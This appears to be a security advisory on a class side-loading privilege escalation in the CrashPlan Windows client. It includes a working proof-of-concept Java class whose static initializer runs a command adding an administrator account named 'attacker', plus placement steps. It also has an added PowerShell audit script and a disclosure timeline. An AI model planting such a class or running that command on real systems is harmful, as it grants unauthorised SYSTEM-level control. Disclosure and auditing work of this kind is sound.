CrashPlan Windows client local elevation of privilege vulnerability: repair suggestions
This article reports and technically analyzes a local elevation of privilege vulnerability in the CrashPlan Windows client 4.8.2.4. The vulnerability can be abused by any local user to gain full control over the operating system. So far, it has been verified on a fully patched Windows 7 x64 English version.
The fundamental problem is that the Windows service "CrashPlan Backup Service" loads and executes files from the insecure file system location C:\ProgramData\CrashPlan.
Among other things, Java class files are searched for in, and eventually loaded from, that location. This results in a class side-loading vulnerability.
The default file system ACL allows any local user to append new files.
Therefore, malicious files can be placed there. To exploit this, I constructed the following Java class:
    package org.slf4j.ext;

    import java.io.Serializable;
    import java.io.ByteArrayInputStream;
    import java.io.ByteArrayOutputStream;
    import java.util.Date;
    import java.util.HashMap;
    import java.util.Iterator;
    import java.util.Map;
    import java.beans.XMLDecoder;
    import java.beans.XMLEncoder;
    import java.beans.ExceptionListener;

    /**
     * Base class for Event Data. Event Data contains data to be logged about
     * Event. Users may extend this class for each EventType they want to log.
     *
     * @author Ralph Goers
     */
    public class EventData implements Serializable {
        // Static initializer: runs once, as soon as the JVM loads the class.
        static
        {
            try {
                Runtime rt = Runtime.getRuntime();
                Process pr = rt.exec("cmd.exe /C \"net user attacker Batman42 /add & net localgroup Administrators attacker /add\"");
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

        /**
         * Default Constructor
         */
        public EventData() {
        }
    }
To inject our own commands, we use a Java static initializer. It is executed as soon as the JVM loads the class. To compile the class, javac is all that is needed:
    javac EventData.java
Finally, the compiled Java class file is placed in the folder C:\ProgramData\CrashPlan\lang\org\slf4j\ext, which has to be created.
After the system restarts, this Java class is loaded and our code is executed with SYSTEM privileges. In this example, the attacker adds a local administrator account to the operating system.
Repair suggestions
Upgrade vulnerable versions to the latest version as soon as possible.
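To check a host for the two conditions described above (folders under the class search path where ordinary users may add files, and class files already present there that are not owned by a privileged account), the following PowerShell audit can be used. It is an added example, not part of the original advisory or any vendor tooling; the function name, the trusted principal list (English account names) and the need for PowerShell 3.0 or later are assumptions.

```powershell
# Added example (not vendor code): audit a directory that a SYSTEM service
# loads classes from. The default path is the one named in the article.
function Test-ClassDirExposure {
    param([string]$Path = 'C:\ProgramData\CrashPlan')
    if (-not (Test-Path -LiteralPath $Path)) { return }

    # Rights that allow creating files or folders, plus GENERIC_WRITE/GENERIC_ALL.
    $rights = [System.Security.AccessControl.FileSystemRights]
    $mask = [int]($rights::CreateFiles) -bor [int]($rights::AppendData) -bor
            0x40000000 -bor 0x10000000
    # Assumption: English account names; extend the list for your environment.
    $trusted = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
               'NT SERVICE\TrustedInstaller', 'CREATOR OWNER'

    # 1) Directories where a non-trusted principal may add files or folders.
    $dirs = @(Get-Item -LiteralPath $Path) +
            @(Get-ChildItem -LiteralPath $Path -Directory -Recurse -ErrorAction SilentlyContinue)
    foreach ($dir in $dirs) {
        foreach ($ace in (Get-Acl -LiteralPath $dir.FullName).Access) {
            $who = $ace.IdentityReference.Value
            if ($ace.AccessControlType -ne 'Allow' -or $trusted -contains $who) { continue }
            if (([int]($ace.FileSystemRights) -band $mask) -ne 0) {
                [pscustomobject]@{
                    Finding = 'WritableDirectory'; Path = $dir.FullName
                    Detail  = "$who has $($ace.FileSystemRights)"
                }
            }
        }
    }

    # 2) Class files already present whose owner is not a trusted principal.
    Get-ChildItem -LiteralPath $Path -Recurse -File -Filter *.class -ErrorAction SilentlyContinue |
        ForEach-Object {
            $owner = (Get-Acl -LiteralPath $_.FullName).Owner
            if ($trusted -notcontains $owner) {
                [pscustomobject]@{
                    Finding = 'UntrustedClassFile'; Path = $_.FullName
                    Detail  = "owner $owner, last written $($_.LastWriteTime)"
                }
            }
        }
}

Test-ClassDirExposure | Format-Table -AutoSize -Wrap
```

An empty result means neither condition was found for the given path; run it from an elevated prompt so that every subfolder ACL can be read.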
Timeline
2017.5.18: vulnerability confirmed
2017.5.22: vulnerability documented and vendor notified
2017.5.25: vendor confirms the vulnerability and an urgent fix
2017.6.13: fixed version released, together with related instructions
2018.2.15: public disclosure